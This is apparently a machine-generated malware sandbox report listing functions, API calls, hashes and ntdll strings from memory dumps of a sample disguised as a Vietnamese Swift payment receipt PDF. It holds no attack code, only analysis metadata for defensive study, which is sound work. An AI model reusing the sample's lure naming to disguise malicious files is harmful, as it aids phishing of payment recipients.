Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Function 01222C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01222C24

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19b0c220a0dba0a2534a7ac13453737988fc86ea2b465e61522055e31f00349f
Instruction ID: 8cf77cac1d54d66c47887e61537e8710c4bb88fbd2501c4318257d28e09cdd82
Opcode Fuzzy Hash: 19b0c220a0dba0a2534a7ac13453737988fc86ea2b465e61522055e31f00349f
Instruction Fuzzy Hash: 6AB09B719115D5D5DA11E764460871B791077D0701F16C161E3034742F4739C1D1F375

Non-executed Functions

Function 01262349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01263187
LdrpInitializeExecutionOptions, xrefs: 0126317D
UseImpersonatedDeviceMap, xrefs: 0126251C
GlobalFlag, xrefs: 01262F3F, 01263059
DisableHeapLookaside, xrefs: 0126246D
MinimumStackCommitInBytes, xrefs: 01262BB0
MaxDeadActivationContexts, xrefs: 01262D82
MaxLoaderThreads, xrefs: 012624EC
ShutdownFlags, xrefs: 012624A1
DisableExceptionChainValidation, xrefs: 0126275F
ExecuteOptions, xrefs: 012625A0
FrontEndHeapDebugOptions, xrefs: 01262489
TracingFlags, xrefs: 01262549
CFGOptions, xrefs: 01262967
GlobalFlag2, xrefs: 01262FC0
RaiseExceptionOnPossibleDeadlock, xrefs: 01262579
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01263176
@, xrefs: 01262942
UnloadEventTraceDepth, xrefs: 012624C0
@, xrefs: 01262B74

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: f617f0a0c40f752487a72cbd617cea7099d657f6cfd0c7403ce8156ccd3b7974
Instruction ID: f515e4f934ec8e4d3a2700466e5db96327246ecda66936a3c6de3ab92e0d9eca
Opcode Fuzzy Hash: f617f0a0c40f752487a72cbd617cea7099d657f6cfd0c7403ce8156ccd3b7974
Instruction Fuzzy Hash: 39928C71624342EFE725CE28C881B6BB7E8BB84754F14492DFB94D7291D770E884CB92

Function 01218620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 0125541F, 0125552E
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012554CE
Critical section address, xrefs: 01255425, 012554BC, 01255534
undeleted critical section in freed memory, xrefs: 0125542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012554E2
corrupted critical section, xrefs: 012554C2
Thread is in a state in which it cannot own a critical section, xrefs: 01255543
Invalid debug info address of this critical section, xrefs: 012554B6
Critical section address., xrefs: 01255502
double initialized or corrupted critical section, xrefs: 01255508
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0125540A, 01255496, 01255519
Thread identifier, xrefs: 0125553A
Address of the debug info found in the active list., xrefs: 012554AE, 012554FA
8, xrefs: 012552E3

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 72b9398d29f415482a3adbf2e52df0381097dbbbcd7e4110226a8b2877900431
Instruction ID: 6f8cb321e2e9311b6e1cbb0081e33d6b56d26f0c723a0287f9b24cccad06d037
Opcode Fuzzy Hash: 72b9398d29f415482a3adbf2e52df0381097dbbbcd7e4110226a8b2877900431
Instruction Fuzzy Hash: AD81BAB0A50359EFDB64CF99C885BAEBBB5FB18B14F10411DFA08B7241D3B5A941CB60

Function 012129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01252624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012524C0
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01252409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01252506
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01252602
@, xrefs: 0125259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01252412
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01252498
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012522E4
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012525EB
RtlpResolveAssemblyStorageMapEntry, xrefs: 0125261F

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: edfa4dbaf77bd7d623f1b96bf2fe5308cb249561f837fcd5dd5f31b5052550a0
Instruction ID: 515542033f38a25bb4c6cd7722a4bb16bfc353c43ce33bf2bfffb582ceaa38e6
Opcode Fuzzy Hash: edfa4dbaf77bd7d623f1b96bf2fe5308cb249561f837fcd5dd5f31b5052550a0
Instruction Fuzzy Hash: A60280B1D10229DFDB61DB54CC81BAAB7B8AF54704F0141DAEB09A7281EB709F84CF59

Function 01288B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

heapType, xrefs: 01288BCB
DefaultBrowser_NOPUBLISHERID, xrefs: 01288D00
lsass.exe, xrefs: 01288BA1
smss.exe, xrefs: 01288B8B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01288BD0
services.exe, xrefs: 01288B96
SegmentHeap, xrefs: 01288BE9
svchost.exe, xrefs: 01288B68
csrss.exe, xrefs: 01288B80
runtimebroker.exe, xrefs: 01288B73

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: f429fcb2b566e697f05d04a48c07b9faaafc8bf2c8c3997c47cb9c52a36606d1
Instruction ID: a9f153fdcfa15282ad7137660c0213775a9c24f5f83e046459efb061f8c8f1d4
Opcode Fuzzy Hash: f429fcb2b566e697f05d04a48c07b9faaafc8bf2c8c3997c47cb9c52a36606d1
Instruction Fuzzy Hash: 6951CF715263529BD329EF288884BABBBECBF98350F54491DEA58C32C4E770D504C792

Function 01290274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 012903A6, 012904B5, 012905DD, 01290682, 012906D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 012906EA
Just reallocated block at %p to %Ix bytes, xrefs: 012905F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0129069F
About to reallocate block at %p to %Ix bytes, xrefs: 012903BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 012904D3
RtlReAllocateHeap, xrefs: 012902BF, 01290362
HEAP[%wZ]: , xrefs: 01290399, 012904A8, 012905D0, 01290675, 012906CC

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: c95a68c0b8fce10a591b7f8c9e0372ed12daf7d7ebb3754d802008da55c6d42f
Instruction ID: 390dadec173d47ea5b18d16bac1c909df59c053afe8734616fb9726264d68294
Opcode Fuzzy Hash: c95a68c0b8fce10a591b7f8c9e0372ed12daf7d7ebb3754d802008da55c6d42f
Instruction Fuzzy Hash: 56D11F3192028ADFDF2ADF6CD441AADBBF5FF4A704F088059F6459B252C3349980CB18

Function 012689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDebug, xrefs: 01268CA5
VerifierDlls, xrefs: 01268CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01268A67
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01268A3D
AVRF: -*- final list of providers -*- , xrefs: 01268B8F
HandleTraces, xrefs: 01268C8F
VerifierFlags, xrefs: 01268C50

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 24db772e00a09d85f0e818d463948d8f35599ce16373ce6ca332d952d2640fb0
Instruction ID: 3e0a4bcd47c4c67ba1cd95c92d793aa0db58da2c553559be60b6d3851a859bb5
Opcode Fuzzy Hash: 24db772e00a09d85f0e818d463948d8f35599ce16373ce6ca332d952d2640fb0
Instruction Fuzzy Hash: D7916772A65742EFD725DF68D895B2A77ECAB64B14F04041CFA40AB2C0D7B09C80CBA1

Function 011EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 011EEB58
, xrefs: 011EF299
{, xrefs: 01244643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 011EEB6C
T, xrefs: 011EEB4E
R, xrefs: 011EEB62

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: f0b26fef9512933f1a9ea82be529a3dcfad59b1305c4b60f7ee61d7a7fd4aef5
Instruction ID: 12d2bd0492a3f32b4f9ee1a6f3ebb77848fbfccb6c80ee60cb46fb55cca2b4f7
Opcode Fuzzy Hash: f0b26fef9512933f1a9ea82be529a3dcfad59b1305c4b60f7ee61d7a7fd4aef5
Instruction Fuzzy Hash: 3BA25874A15A6A8FDB68DF58CC887ADBBB5BF45304F1442E9D90DA7290DB309E81CF00

Function 012163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 012540D8
_LdrpInitialize, xrefs: 012540DF, 01254141, 01254205, 0125425F
minkernel\ntdll\ldrinit.c, xrefs: 012540E9, 0125414B, 0125420F, 01254269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 012541FE
Process initialization failed with status 0x%08lx, xrefs: 0125413A
Delaying execution failed with status 0x%08lx, xrefs: 01254258

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: ec3434de9bff81c3d375d68629fb925f9311ff371badb993ee24e357eb8f0329
Instruction ID: 0d5fd988677ca209f30587464d35bf8c610221417656eca0d4c311a753c8fc24
Opcode Fuzzy Hash: ec3434de9bff81c3d375d68629fb925f9311ff371badb993ee24e357eb8f0329
Instruction Fuzzy Hash: 19914B71F617669BEB39EF58E889BAE7BF1FB60B14F100118DA0067285E7F09441C791

Function 011D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 011D6496
LdrpInitShimEngine, xrefs: 012399F4, 01239A07, 01239A30
minkernel\ntdll\ldrinit.c, xrefs: 01239A11, 01239A3A
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 012399ED
Getting the shim user exports failed with status 0x%08lx, xrefs: 01239A01
Loading the shim user DLL failed with status 0x%08lx, xrefs: 01239A2A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 8124893e6941f9e213f8da6f6aad462570c6a0f5cbc8d0addde10e9a5d03a701
Instruction ID: 8f7b9e94154dd502622f91f81875c260c8ffeb198db9ea0e720055d9072028d6
Opcode Fuzzy Hash: 8124893e6941f9e213f8da6f6aad462570c6a0f5cbc8d0addde10e9a5d03a701
Instruction Fuzzy Hash: AE5105B16283019FEB28DF24D885BAB77E4FB85B48F01091EF68597150D770E985CB93

Function 01212674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01252165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01252178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0125219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012521BF
RtlGetAssemblyStorageRoot, xrefs: 01252160, 0125219A, 012521BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01252180

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: d1ff0401dd6dea8be569764e435cf85417c46d2a73bce94b41f50b6efbd0407b
Instruction ID: 6a27b9264ecbe2406beb05b930bcd37390507a09ea14d9fe825d0c6eb599eab4
Opcode Fuzzy Hash: d1ff0401dd6dea8be569764e435cf85417c46d2a73bce94b41f50b6efbd0407b
Instruction Fuzzy Hash: 99313736B60212F7EB25CA9A9C81F6B7BA8DB74E50F15405DFF047B185D3B09A01CBA0

Function 0121C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 012581E5
minkernel\ntdll\ldrinit.c, xrefs: 0121C6C3
LdrpInitializeProcess, xrefs: 0121C6C4
LdrpInitializeImportRedirection, xrefs: 01258177, 012581EB
Loading import redirection DLL: '%wZ', xrefs: 01258170
minkernel\ntdll\ldrredirect.c, xrefs: 01258181, 012581F5

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: e93fb036a2ce2b8e501aa714790ee3d3fcaa20d86f8b7ff4c11057aec5a4db4f
Instruction ID: 7cdc8cfee72b56f1177b8e51159caebdd12f3c4eb63fdcfcca75ee26a1f6c7f1
Opcode Fuzzy Hash: e93fb036a2ce2b8e501aa714790ee3d3fcaa20d86f8b7ff4c11057aec5a4db4f
Instruction Fuzzy Hash: 873106716653429FD314EB29D886E3A77E4AFE4B10F05051CF9805B2D1D760ED04C7A2

Function 0122096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01222DF0: LdrInitializeThunk.NTDLL ref: 01222DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01220BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01220BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01220D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01220D74

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 5dd1aee86178414964e44951e7cefc7f11ca4c5b1cfa9ed48c21e099d2a8895f
Instruction ID: cb211fa84941098f0332a3a3ba17a588f5f9b04a07ea112afb0b5eba3c9718a2
Opcode Fuzzy Hash: 5dd1aee86178414964e44951e7cefc7f11ca4c5b1cfa9ed48c21e099d2a8895f
Instruction Fuzzy Hash: D1425D71910716EFDB61CF28C881BAAB7F5FF44314F1445A9EA89DB241E770AA84CF60

Function 00407B1B Relevance: 6.4, Strings: 5, Instructions: 116COMMON

Download Yara Rule

Strings

b, xrefs: 00407BE7
a, xrefs: 00407BEE
d, xrefs: 00407BF5
C, xrefs: 00407BD9
i, xrefs: 00407BE0

Memory Dump Source

Source File: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Yara matches

Similarity

API ID:
String ID: C$a$b$d$i
API String ID: 0-2334916691
Opcode ID: ce659b5985c4fda143c39d2f74d73e31e2ae076c581b5363530e5f821b7790bf
Instruction ID: 9cefb149102013ebc1c11f0c7370e417644ed2b8a2a06f7475ac7e254a961867
Opcode Fuzzy Hash: ce659b5985c4fda143c39d2f74d73e31e2ae076c581b5363530e5f821b7790bf
Instruction Fuzzy Hash: 6731C371E44208ABE714EFE5EC82BEFB7B8EF45308F00451EF508A7241E779654187A9

Function 011EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 011EA3E7
LdrResFallbackLangList Enter, xrefs: 011EA3EF
LdrResFallbackLangList Exit, xrefs: 011EA3FF
6, xrefs: 011EA3F7

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: a8b7f50d85523d91333de7b07737e5fa5f544e7993128f2c690db7ae916bf8e5
Instruction ID: 5b044373391e4c85103cefdfbf9c1808eb4df33caf64bfdbe85e3645b693b39a
Opcode Fuzzy Hash: a8b7f50d85523d91333de7b07737e5fa5f544e7993128f2c690db7ae916bf8e5
Instruction Fuzzy Hash: 1AC1AD70118782CFD719CF99E048B6ABBE4FF88704F05886AFA958B251E734C949CB57

Function 01218402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0121855E
minkernel\ntdll\ldrinit.c, xrefs: 01218421
LdrpInitializeProcess, xrefs: 01218422
@, xrefs: 01218591

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 02af401c8692936f9d5e680a7277bd77361edf4e6a57c0281a9afe72925b952b
Instruction ID: d092f7e0df0a548d9ba14d557ea961f2d11489c882d48fc3490ef019197e2656
Opcode Fuzzy Hash: 02af401c8692936f9d5e680a7277bd77361edf4e6a57c0281a9afe72925b952b
Instruction Fuzzy Hash: 7591A971568346BFD721DF25DC80FAFBAE8FB98684F40092EFA8492155E734D904CB62

Function 0121273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012521D9, 012522B1
SXS: %s() passed the empty activation context, xrefs: 012521DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012522B6
.Local, xrefs: 012128D8

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: b400ab0c7a42da101b7af7988d5d8f8947eb52e22745902d56c9106b14a859b8
Instruction ID: a909687e66036b634c3c72b90ac9df7eeb1f60b885352aeb541daa94878ca443
Opcode Fuzzy Hash: b400ab0c7a42da101b7af7988d5d8f8947eb52e22745902d56c9106b14a859b8
